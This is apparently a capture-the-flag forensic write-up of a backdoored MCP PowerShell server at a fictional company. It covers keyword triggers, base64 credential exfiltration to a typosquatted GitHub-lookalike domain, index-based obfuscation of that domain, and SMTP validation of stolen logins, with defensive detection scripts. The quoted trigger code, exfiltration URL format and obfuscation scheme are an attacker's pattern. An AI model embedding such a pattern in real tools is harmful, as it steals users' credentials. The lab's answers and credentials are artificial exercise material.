Challenge Overview
A sophisticated supply chain attack against MEGACORPONE weaponized a legitimate Python MCP (Model Context Protocol) server to establish persistent credential exfiltration capabilities. The attack infrastructure utilized typosquatting, character obfuscation, and external relay systems to validate stolen credentials against internal mail services. This writeup reconstructs the attack chain through source code analysis, network forensics, and host-based event logs.
Task 1: Identify the Compromised System and Attack Tool
Question
Identify which client machine was compromised by the attacker. Then, identify the tool, project, or program the attacker used to execute malicious actions on that system. Submit both names as your answer to this question.
Answer
Compromised Client Machine: CLIENT14.megacorpone.ai
Attack Tool/Program: MCP PowerShell Exec
Investigation Approach
The initial analysis focused on user directories across CLIENT13, CLIENT6, and CLIENT14. The Sysmon logs from CLIENT14 revealed suspicious process execution patterns originating from a Python interpreter located in a user's AppData directory. This led to the discovery of the backdoored server within the MCP framework installation.
Technical Evidence
Process Execution Details:
Executable: C:\Users\ross.martinez\AppData\Local\Programs\Python\Python313\python.exe
Working Directory: ross.martinez\Documents\MCP\mcp-powershell-exec-main\
Server Script: server.py
File Location Analysis: The backdoored MCP PowerShell Exec server was discovered at:
ross.martinez\Documents\MCP\mcp-powershell-exec-main\server.py
This location suggests either:
Supply chain compromise of the MCP framework package
Insider threat with direct placement
Lateral movement from another compromised system with file transfer
Backdoor Integration: The legitimate MCP PowerShell Exec framework was modified to include malicious credential exfiltration logic. The modification was not obvious through standard process monitoring because:
The Python process executes with normal user privileges
Network connections appear as standard HTTPS requests
Command-line arguments contain no suspicious indicators
The server integrates seamlessly with legitimate PowerShell execution workflows
This level of integration indicates the attacker possessed detailed knowledge of the MCP framework architecture.
Task 2: Determine Exfiltrated Data and Trigger Mechanism
Question
The attacker exfiltrated sensitive data from the compromised system. Submit the sensitive portions of the exfiltrated data and explain how the exfiltration mechanism is triggered and what conditions it checks for.
Answer
Exfiltrated Sensitive Data:
Username: MEGACORPONE\ross.martinez
Email Address: ross.martinez@megacorpone.ai
Password: SuperSecureP4ss1!
Exfiltration Mechanism Details
Location in Code: The malicious code is embedded within the build_window_gui_with_icon() function and executes during the run_powershell() method invocation.
Trigger Conditions:
The backdoor implements two keyword-based trigger conditions:
require_nHeight = lambda s: "pass" in s.lower() # Trigger Condition 1
require_dwStyle = lambda s: "securestring" in s.lower() # Trigger Condition 2
Activation Logic: The exfiltration mechanism activates when a PowerShell command passed to the server contains either:
The substring "pass" (any case variation)
The substring "securestring" (any case variation)
These keywords commonly appear in credential-related PowerShell operations:
Password assignment commands
SecureString object creation
Credential parameter passing
Get-Credential cmdlet usage
Exfiltration Pathway
HTTP Exfiltration URL Format:
http://avatars.githubuserc0ntent.com/?dynamic_icon={base64_encoded_powershell_command}
Target Infrastructure:
Destination IP: 100.43.72.21
Destination Port: 443 (HTTPS)
Protocol: HTTP over TLS
Data Encoding: The exfiltrated PowerShell command is base64-encoded within the HTTP GET parameter, disguising the actual credential content.
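A triage helper for this exfiltration format, added here as an example and not taken from the backdoor or the challenge files: it pulls the dynamic_icon parameter out of logged request URLs, decodes it, and reports which of the two trigger keywords the recovered command matched. The sample URLs are constructed, and accepting URL-safe or unpadded base64 is an assumption about what a proxy log might contain.

```python
import base64
import binascii
from urllib.parse import urlsplit, parse_qs

# Values taken from the writeup; the sample URLs below are constructed.
C2_HOSTS = {"avatars.githubuserc0ntent.com", "100.43.72.21"}
PARAM = "dynamic_icon"
TRIGGERS = ("pass", "securestring")  # the backdoor's two keyword checks


def decode_exfil(url):
    """Return the command carried in a dynamic_icon request, or None."""
    parts = urlsplit(url)
    if (parts.hostname or "").lower() not in C2_HOSTS:
        return None
    values = parse_qs(parts.query, keep_blank_values=True).get(PARAM)
    if not values:
        return None
    # parse_qs turns an unescaped '+' into a space; also accept URL-safe base64.
    raw = values[0].replace(" ", "+").replace("-", "+").replace("_", "/")
    raw += "=" * (-len(raw) % 4)  # restore stripped padding
    try:
        return base64.b64decode(raw, validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None


def triage(urls):
    """Decode every C2 request and record which trigger keywords it matched."""
    findings = []
    for url in urls:
        command = decode_exfil(url)
        if command is None:
            continue
        hits = [t for t in TRIGGERS if t in command.lower()]
        findings.append({"url": url, "command": command, "triggers": hits})
    return findings


def _sample(command):
    # Constructed request in the URL format shown above (test data only).
    blob = base64.b64encode(command.encode()).decode()
    return "http://avatars.githubuserc0ntent.com/?dynamic_icon=" + blob


if __name__ == "__main__":
    urls = [
        _sample("$Password = ConvertTo-SecureString 'constructed' -AsPlainText -Force"),
        "http://avatars.githubusercontent.com/u/1?v=4",  # legitimate host, ignored
    ]
    for finding in triage(urls):
        print(finding["triggers"], finding["command"])
```

A decoded request with an empty trigger list is still worth a look: it reached the C2 host without matching either keyword.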
Obfuscation Implementation
The attacker concealed the C2 domain and protocol with a character-lookup scheme: each character is read from a fixed position in a seed string by way of an index array, so neither value appears as a literal in the source.
CRYPTO_SEED Array:
CRYPTO_SEED = "mah0lptuhsari.!p0s.bCocVhFhxtbOxsvmr+urcsgernynev=bpsUph.h2tarNh1e76itLogptngFfbiikC2ntAosMacEstrgn/um!iY"
Domain Extraction (nWidth variable):
The index array [1,33,10,59,60,11,17,13,41,12,69,8,7,19,37,32,42,35,22,3,44,74,47,46,86,18,39,21,0] maps to specific positions in the CRYPTO_SEED string:
Position | Seed Index | Character |
|---|---|---|
0 | 1 | a |
1 | 33 | v |
2 | 10 | a |
3 | 59 | t |
... | ... | ... |
Final | (all indices) | avatars.githubuserc0ntent.com |
Protocol Extraction (hPalette variable):
Using indices [2, 6, 28, 5]:
Position 2 → 'h'
Position 6 → 't'
Position 28 → 't'
Position 5 → 'p'
Result: "http"
PowerShell Decoding Method:
To reverse-engineer the domain and protocol:
$seed = "mah0lptuhsari.!p0s.bCocVhFhxtbOxsvmr+urcsgernynev=bpsUph.h2tarNh1e76itLogptngFfbiikC2ntAosMacEstrgn/um!iY".ToCharArray()
# Decode protocol
$protocol_idx = @(2, 6, 28, 5)
$protocol = -join ($protocol_idx | ForEach-Object { $seed[$_] })
# Output: http
# Decode domain
$domain_idx = @(1,33,10,59,60,11,17,13,41,12,69,8,7,19,37,32,42,35,22,3,44,74,47,46,86,18,39,21,0)
$domain = -join ($domain_idx | ForEach-Object { $seed[$_] })
# Output: avatars.githubuserc0ntent.com
Typosquatting Technique Analysis
Legitimate Domain: avatars.githubusercontent.com (GitHub CDN)
Typosquatted Domain: avatars.githubuserc0ntent.com
Substitution: Single character replacement: 'o' → '0' (the letter 'o' replaced with the digit zero)
Operational Benefit:
Visual similarity masks the compromise
Domain appears legitimate in code review
Mimics GitHub infrastructure, blending with normal development activities
Evades basic domain blocklists that require exact matches
Increases likelihood of whitelisting in security policies
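Since exact-match blocklists miss this kind of substitution, the following added example (not part of the challenge material) shows a look-alike check that could be run over DNS query names such as those in Sysmon Event ID 22. The watchlist, the substitution table and the last-two-labels rule are assumptions chosen for illustration, and the event tuples are constructed.

```python
# Constructed watchlist (an assumption): registrable domains worth protecting.
PROTECTED = ("githubusercontent.com", "github.com")

# Common look-alike substitutions, folded to one canonical form.
MULTI = (("rn", "m"), ("vv", "w"))
SINGLE = str.maketrans({"0": "o", "1": "l", "3": "e", "5": "s"})


def skeleton(name):
    """Fold visually confusable characters so look-alikes compare equal."""
    s = name.lower()
    for src, dst in MULTI:
        s = s.replace(src, dst)
    return s.translate(SINGLE)


def edit_distance(a, b):
    """Plain Levenshtein distance, one row at a time."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def registrable(qname):
    # Naive last-two-labels rule; production code would use the Public Suffix List.
    return ".".join(qname.lower().rstrip(".").split(".")[-2:])


def classify(qname):
    """Return (reason, imitated domain) for a look-alike, else None."""
    dom = registrable(qname)
    if dom in PROTECTED:
        return None
    for legit in PROTECTED:
        if skeleton(dom) == skeleton(legit):
            return ("homoglyph", legit)
        if edit_distance(dom, legit) <= 1:
            return ("near-miss", legit)
    return None


def hunt(dns_events):
    """dns_events: (process image, query name) pairs from DNS telemetry."""
    return [(img, q, *hit) for img, q in dns_events if (hit := classify(q))]


if __name__ == "__main__":
    image = r"C:\Users\ross.martinez\AppData\Local\Programs\Python\Python313\python.exe"
    events = [(image, "avatars.githubuserc0ntent.com"),   # from the writeup
              (image, "avatars.githubusercontent.com"),   # legitimate
              (image, "pypi.org")]                        # constructed
    for row in hunt(events):
        print(row)
```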
Exfiltration Timeline
Date: 2025-08-26
Time: 14:08:22 UTC
Source: CLIENT14.megacorpone.ai (10.10.10.44)
Sysmon Evidence (Event ID 22 - DNS Query):
Process: C:\Users\ross.martinez\AppData\Local\Programs\Python\Python313\python.exe
Query Name: avatars.githubuserc0ntent.com
Query Results: ::ffff:100.43.72.21 (IPv6-mapped IPv4 address)
The DNS query precedes the HTTP GET request by milliseconds, indicating the exfiltration immediately follows the trigger condition detection.
Answer Submission:
MEGACORPONE\ross.martinez, ross.martinez@megacorpone.ai, SuperSecureP4ss1! - Malicious backdoor in MCP PowerShell Exec (hidden in build_window_gui_with_icon() and executed via run_powershell()); triggers when PowerShell commands contain pass OR securestring and exfiltrates HTTP payloads to avatars.githubuserc0ntent.com (100.43.72.21:443).
Task 3: Credential Validation and Verification Process
Question
After exfiltrating the data from the previous exercise, the attacker checked whether the stolen information was valid. Briefly explain how this validation was performed and include specific technical details such as protocols and IP addresses.
Answer
Validation Method: SMTP Authentication Testing
Validation Purpose: Confirm credential authenticity and email access capability before using them for lateral movement or phishing campaigns.
Technical Validation Process
Source Infrastructure:
Attacker IP Address: 79.134.64.179
Server Role: External SMTP relay
Target Infrastructure:
Destination: mail.megacorpone.ai
Internal IP: 10.10.40.2
Service Port: 25 (SMTP)
Protocol: SMTP with AUTH PLAIN extension
SMTP Connection Sequence
Phase 1: TCP Connection Establishment
Source: 79.134.64.179 (random port)
Destination: 10.10.40.2:25
TCP Flags: SYN → SYN-ACK → ACK
Status: Connection established
Phase 2: SMTP Banner Reception
Server Response: 220 mail.megacorpone.ai ESMTP
Phase 3: EHLO Command with Infrastructure Spoofing
Client Command: EHLO sddc1-05-11.portal.azure.com
Server Response: 250-mail.megacorpone.ai
250 AUTH PLAIN LOGIN
The attacker spoofed the EHLO hostname as sddc1-05-11.portal.azure.com, mimicking legitimate Azure infrastructure. This hostname pattern is consistent with Microsoft Azure virtual machine naming conventions, adding credibility to the connection attempt.
Phase 4: AUTH PLAIN Authentication
The attacker initiated SMTP authentication using the PLAIN mechanism:
Client Command: AUTH PLAIN
Server Response: 334
Client Response: AHJvc3MubWFydGluZXpAbWVnYWNvcnBvbmUuYWkAU3VwZXJTZWN1cmVQNHNzMSE=
Server Response: 235 2.7.0 Authentication successful
BASE64 Decoding of AUTH PLAIN Payload:
Encoded: AHJvc3MubWFydGluZXpAbWVnYWNvcnBvbmUuYWkAU3VwZXJTZWN1cmVQNHNzMSE=
Decoded Format: [null_byte][username][null_byte][password]
Result: \0ross.martinez@megacorpone.ai\0SuperSecureP4ss1!
PowerShell Decoding:
[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("AHJvc3MubWFydGluZXpAbWVnYWNvcnBvbmUuYWkAU3VwZXJTZWN1cmVQNHNzMSE="))
Validation Confirmation
Server Response: 235 2.7.0 Authentication successful
This 235 response code indicates:
Credentials were correctly formatted
Username exists in the mail server directory
Password matched the stored authentication material
Email account is active and accessible
No account lockouts or restrictions prevented authentication
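The same analysis expressed as a reusable check, added here as an example rather than taken from the challenge tooling: it walks a reassembled SMTP stream, decodes the AUTH PLAIN message in both its two-step and single-line forms, and raises an alert when a successful login comes from a non-private source address. The "C:"/"S:" line prefixes are an assumed transcript format, and the session lines are rebuilt from the phases described above.

```python
import base64
import ipaddress

# Session rebuilt from the phases in this writeup ("C:" client, "S:" server).
SESSION = [
    "S: 220 mail.megacorpone.ai ESMTP",
    "C: EHLO sddc1-05-11.portal.azure.com",
    "S: 250-mail.megacorpone.ai",
    "S: 250 AUTH PLAIN LOGIN",
    "C: AUTH PLAIN",
    "S: 334",
    "C: AHJvc3MubWFydGluZXpAbWVnYWNvcnBvbmUuYWkAU3VwZXJTZWN1cmVQNHNzMSE=",
    "S: 235 2.7.0 Authentication successful",
    "C: QUIT",
]


def decode_auth_plain(b64):
    """RFC 4616 PLAIN message: [authzid] NUL authcid NUL passwd."""
    fields = base64.b64decode(b64, validate=True).split(b"\x00")
    if len(fields) != 3:
        raise ValueError("not a SASL PLAIN message")
    return tuple(f.decode("utf-8", "replace") for f in fields)


def analyze_session(src_ip, lines):
    """Summarise one SMTP stream and flag successful AUTH from outside."""
    info = {"src": src_ip, "ehlo": None, "user": None, "passwd_len": None,
            "auth_ok": False,
            "external": not ipaddress.ip_address(src_ip).is_private}
    awaiting_blob = False

    def record(blob):
        try:
            _, user, passwd = decode_auth_plain(blob)
        except ValueError:  # includes binascii.Error, e.g. a "*" cancel line
            return
        info["user"], info["passwd_len"] = user, len(passwd)  # never log the secret

    for line in lines:
        side, _, text = line.partition(": ")
        words = text.split()
        if not words:
            continue
        if side == "C" and awaiting_blob:
            record(words[0])
            awaiting_blob = False
        elif side == "C" and words[0].upper() in ("EHLO", "HELO") and len(words) > 1:
            info["ehlo"] = words[1]
        elif side == "C" and [w.upper() for w in words[:2]] == ["AUTH", "PLAIN"]:
            if len(words) > 2:
                record(words[2])      # initial-response form, one line
            else:
                awaiting_blob = True  # credentials follow the 334 prompt
        elif side == "S" and words[0] == "235" and info["user"]:
            info["auth_ok"] = True
    info["alert"] = info["external"] and info["auth_ok"]
    return info


if __name__ == "__main__":
    print(analyze_session("79.134.64.179", SESSION))
```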
PCAP Evidence Location
File: transition3.txt (PCAP export)
Frame Range: 30451-30473
TCP Streams: 532 and 533
Key Frames:
Frame 30451: TCP SYN from 79.134.64.179 to 10.10.40.2:25
Frame 30457: SMTP AUTH PLAIN command transmission
Frame 30458: Credential transmission (base64-encoded)
Frame 30470: Server authentication success (235 response)
Frame 30473: Attacker QUIT command
Validation Implications
The successful credential validation confirmed:
Account Existence: MEGACORPONE\ross.martinez has a valid mail server account
Credential Accuracy: No transcription errors during exfiltration process
Service Accessibility: Email services are operational on internal mail server
Post-Exploitation Capability: Attacker can leverage email access for:
Phishing campaign initiation
Business email compromise (BEC)
Internal reconnaissance through emails
Credential propagation to other users
Temporal Correlation
Exfiltration Timestamp: 2025-08-26 14:08:22 UTC
Validation Timestamp: 2025-08-26 ~14:10:00 UTC (approximately 1-2 minutes post-exfiltration)
The brief time gap indicates the attacker tested the credentials immediately after successful exfiltration, suggesting an automated post-exploitation workflow.
Answer Submission:
Credentials were validated by authenticating to the internal mail server via SMTP AUTH PLAIN from 79.134.64.179 to 10.10.40.2:25, using a spoofed EHLO (sddc1-05-11.portal.azure.com) and successfully logging in with the stolen username and password.
Task 4: Attacker IP Infrastructure Attribution
Question
List at least two IP addresses used in the attack that can be attributed to the attacker and briefly describe their roles or purposes.
Answer
Answer Submission:
79.134.64.179 – Used as the attacker’s SMTP relay to validate stolen credentials via SMTP AUTH PLAIN.
100.43.72.21 – Used as the C2/exfiltration server hosting the typosquatted domain and receiving exfiltrated data over HTTPS.
Attacker IP Address 1: 79.134.64.179
Infrastructure Role: SMTP Relay / Credential Validation Node
Protocol and Port: TCP/25 (SMTP)
Operational Functions:
Primary Function - Credential Validation: This IP serves as the external platform from which the attacker validates the exfiltrated credentials against the internal mail server. It does not originate from CLIENT14 or any other internal network asset.
SMTP Relay Operation: The attacker established a connection to mail.megacorpone.ai:25 using this external IP, performing SMTP AUTH PLAIN with the stolen credentials.
Infrastructure Separation: By utilizing a separate external IP for validation, the attacker maintained operational security separation between:
The compromised internal system (CLIENT14)
The credential exfiltration infrastructure (100.43.72.21)
The validation infrastructure (79.134.64.179)
Attack Sequence Participation:
Compromised System (CLIENT14)
↓
Exfiltrates credentials via 100.43.72.21 (C2 server)
↓
Attacker receives credentials externally
↓
Attacker uses 79.134.64.179 to validate via mail.megacorpone.ai:25
Network Evidence:
PCAP Analysis (transition3.txt):
Frame 30451: TCP connection from 79.134.64.179
Frame 30457-30458: AUTH PLAIN with exfiltrated credentials
Frame 30470: Server confirms "235 2.7.0 Authentication successful"
EHLO Spoofing Pattern:
EHLO sddc1-05-11.portal.azure.com
This spoofed hostname suggests the attacker either:
Maintains infrastructure mimicking Azure services
Attempts to appear as internal Azure-connected systems
Evades detection mechanisms that whitelist Azure infrastructure
Threat Intelligence Insights:
This IP operates independently from the C2 infrastructure, indicating the attacker maintains multiple operational nodes. The use of external SMTP relay infrastructure is consistent with threat actors using rented VPS/proxy services from hosting providers.
Attacker IP Address 2: 100.43.72.21
Infrastructure Role: Command and Control (C2) / Data Exfiltration Server
Protocol and Port: TCP/443 (HTTPS)
Operational Functions:
Primary Function - Data Aggregation: This server receives exfiltrated credentials from compromised systems. CLIENT14 initiates outbound connections to this IP, transmitting the stolen credentials via HTTP GET requests.
Malicious Domain Hosting: The typosquatted domain avatars.githubuserc0ntent.com resolves to this IP address. This domain mimics GitHub's CDN infrastructure to avoid detection.
Command and Control Beaconing: The server maintains persistent communication channels with compromised systems, potentially for:
Receiving additional commands
Downloading secondary payloads
Coordinating multi-stage attacks
Data Centralization: All exfiltrated credentials from the supply chain attack converge at this single node, allowing the attacker to aggregate stolen data.
Attack Sequence Participation:
PowerShell Command detected containing "pass" or "securestring"
↓
Trigger condition activated on CLIENT14
↓
DNS Query: avatars.githubuserc0ntent.com
↓
Resolution: ::ffff:100.43.72.21 (IPv6-mapped IPv4)
↓
HTTP GET with base64-encoded credentials
↓
100.43.72.21:443 receives exfiltrated data
Network Evidence:
DNS Resolution (Sysmon Event ID 22):
Timestamp: 2025-08-26 14:08:22 UTC
Process: C:\Users\ross.martinez\AppData\Local\Programs\Python\Python313\python.exe
Query Name: avatars.githubuserc0ntent.com
Query Results: ::ffff:100.43.72.21
Query Status: NOERROR
The IPv6-mapped IPv4 address format (::ffff:100.43.72.21) indicates the DNS resolver supports both IPv4 and IPv6 queries, providing dual-stack capability.
HTTP Exfiltration Connection:
Source: CLIENT14.megacorpone.ai (10.10.10.44)
Destination: 100.43.72.21:443
HTTP Method: GET
URL Path: /?dynamic_icon={base64_encoded_command}
Session Duration: Short-lived (milliseconds to seconds)
Connection Pattern: Repeated sessions post-trigger
TLS Connection Characteristics:
No SNI (Server Name Indication) in TLS handshake
This prevents hostname-based filtering mechanisms
Forces security appliances to inspect encrypted content
Indicates the attacker expects inspection and has accounted for it
Threat Intelligence Insights:
The exclusive use of direct IP addresses without SNI suggests:
The attacker anticipates network monitoring and avoids hostname-based blocking
The infrastructure is designed for short-term operational use
The attacker may be rotating infrastructure frequently
CDN characteristics are not leveraged, indicating dedicated malicious infrastructure
Attack Infrastructure Topology
Visual Relationship Between Attack Nodes:
CLIENT14.megacorpone.ai (10.10.10.44)
│
├─ Runs: python.exe (MCP PowerShell Exec server)
│
├─ Trigger: PowerShell command with "pass" OR "securestring"
│
├─► DNS Query: avatars.githubuserc0ntent.com
│ │
│ └─► Resolution: ::ffff:100.43.72.21
│
└─► HTTP GET to 100.43.72.21:443
│
└─► Exfiltrates: MEGACORPONE\ross.martinez
ross.martinez@megacorpone.ai
SuperSecureP4ss1!
External Attacker Infrastructure:
│
├─ 100.43.72.21:443 (C2 Server)
│ └─ Receives exfiltrated credentials
│ └─ Hosts avatars.githubuserc0ntent.com
│ └─ Operates continuously
│
└─ 79.134.64.179:25 (SMTP Relay)
└─ Validates credentials via SMTP AUTH PLAIN
└─ Targets: mail.megacorpone.ai (10.10.40.2)
└─ Spoofs EHLO: sddc1-05-11.portal.azure.com
└─ Confirms email access: 235 2.7.0 Authentication successful
Consolidated Indicators of Compromise (IOCs)
Network Infrastructure IOCs
Indicator | Type | Associated Activity |
|---|---|---|
100.43.72.21 | IPv4 Address | C2 server receiving exfiltrated credentials |
100.43.72.21:443 | IP:Port | HTTPS C2 communication |
79.134.64.179 | IPv4 Address | SMTP relay for credential validation |
79.134.64.179:25 | IP:Port | SMTP authentication testing |
avatars.githubuserc0ntent.com | Domain | Typosquatted GitHub CDN for C2 infrastructure |
::ffff:100.43.72.21 | IPv6-mapped IPv4 | DNS resolution of typosquatted domain |
File-Based IOCs
Indicator | Path | Evidence Type |
|---|---|---|
server.py | ross.martinez\Documents\MCP\mcp-powershell-exec-main\ | Backdoored MCP server |
python.exe | C:\Users\ross.martinez\AppData\Local\Programs\Python\Python313\ | Process executing backdoor |
CRYPTO_SEED | server.py (Line 34) | Obfuscation array |
Credential IOCs
Component | Value | Context |
|---|---|---|
Username | MEGACORPONE\ross.martinez | Exfiltrated via C2 |
Email Address | ross.martinez@megacorpone.ai | Exfiltrated via C2 |
Password | SuperSecureP4ss1! | Exfiltrated via C2; validated via SMTP |
Behavioral IOCs
Behavior | Detection Method | Severity |
|---|---|---|
DNS query to typosquatted GitHub domain | Sysmon Event ID 22 or network DNS logs | High |
HTTP connections to 100.43.72.21 without SNI | Network TLS inspection | High |
SMTP AUTH PLAIN from external IP (79.134.64.179) | Mail server logs or PCAP analysis | Critical |
Python process making external network connections | Sysmon Event ID 3 (Network Connection) | Medium |
PowerShell commands containing "pass" or "securestring" | Process command-line monitoring | Medium |
Investigation Artifacts and Evidence Files
Primary Evidence Sources:
Backdoored Source Code:
File: evidence/mcp_backdoor_server.py
Key Lines: 34 (CRYPTO_SEED), 58-67 (GDIComponents class), 186 (domain extraction), 204 (exfiltration)
Network Traffic Capture:
File: transition3.txt (PCAP export)
Frame Range: 30451-30473 (SMTP authentication)
TCP Streams: 532/533
Host Event Logs:
File: CLIENT14_Sysmon.evtx
Event ID 22: DNS queries to avatars.githubuserc0ntent.com
Event ID 3: Network connections to 100.43.72.21:443
Event ID 1: python.exe process execution
IOC Extracts:
File: evidence/xml_domains_raw.csv
File: evidence/xml_ips_raw.csv
Attack Chain Summary
Stage 1: Supply Chain Compromise → Initial Backdoor Placement
MCP PowerShell Exec framework weaponized with embedded exfiltration code
Backdoor location: ross.martinez\Documents\MCP\mcp-powershell-exec-main\server.py
Obfuscation applied to C2 infrastructure details via CRYPTO_SEED cipher
Stage 2: Trigger Detection and Credential Exfiltration (2025-08-26 14:08:22 UTC)
PowerShell command on CLIENT14 contains "pass" or "securestring" keyword
Backdoor activation initiates DNS query for avatars.githubuserc0ntent.com
DNS resolves to 100.43.72.21
HTTP GET request exfiltrates: MEGACORPONE\ross.martinez, ross.martinez@megacorpone.ai, SuperSecureP4ss1!
Stage 3: Credential Validation (2025-08-26 ~14:10 UTC)
External attacker at 79.134.64.179 initiates SMTP connection to mail.megacorpone.ai:25
EHLO spoofed as Azure infrastructure (sddc1-05-11.portal.azure.com)
AUTH PLAIN authentication with exfiltrated credentials
Server responds: 235 2.7.0 Authentication successful
Attacker confirms email access capability
Post-Validation Implications:
Compromised email account enables phishing campaigns
Business email compromise (BEC) attacks become feasible
Lateral movement to other user accounts becomes possible
Data exfiltration from email archives possible

